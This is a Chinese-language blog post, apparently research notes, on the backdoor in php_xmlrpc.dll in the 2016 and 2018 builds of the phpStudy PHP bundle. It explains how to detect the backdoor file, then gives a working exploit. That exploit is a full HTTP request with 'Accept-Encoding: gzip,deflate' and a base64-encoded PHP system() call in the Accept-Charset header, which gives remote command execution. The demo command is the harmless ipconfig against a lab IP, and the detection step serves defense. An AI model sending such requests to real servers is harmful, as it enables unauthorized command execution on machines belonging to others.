【研究】PHPstudy后门利用

1.环境

测试的是这两个版本
phpStudy_2016.11.03 后门版
PhpStudy20180211 后门版

PhpStudy软件对于国内众多开发者而言,并不陌生。它是一款免费的PHP调试环境的程序集成包,集成了最新的Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接使用,具有PHP环境调试和PHP开发功能。因为免费公益、简易方便,现已发展到一定的规模,有着近百万PHP语言学习者、开发者用户。

2.原理

程序包自带PHP的php_xmlrpc.dll模块隐藏有后门

3.影响版本

phpStudy20161103版本:

php5.4.45与php5.2.17

phpStudy20180211版本:

php5.4.45与php5.2.17

4.后门检测

下载对应版本,启动对应版本

检查一下后门文件有没有
位置:

xxxx\phpstudy\PHPTutorial\php\php-5.2.17\ext
我用的是这个版本
xxxx\phpstudy\PHPTutorial\php\php-5.4.45\ext
找到目录下的php_xmlrpc.dll文件
![在这里插入图片描述](/images/20190929104050280.png
打开搜索eval关键字:
![在这里插入图片描述](/images/20190929104300624.png
这就算是存在

5.漏洞利用

然后随便访问一个php文件
抓包改掉请求头字段:

1
2
accept-Encoding中逗号后面的空格要去掉
Accept-Charset为system('ipconfig')的base64编码

改完

1
2
accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

![在这里插入图片描述](/images/20190929105541822.png

1
2
3
4
5
6
7
8
9
10
GET / HTTP/1.1
Host: 10.77.0.100
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
accept-Encoding:gzip,deflate
Accept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0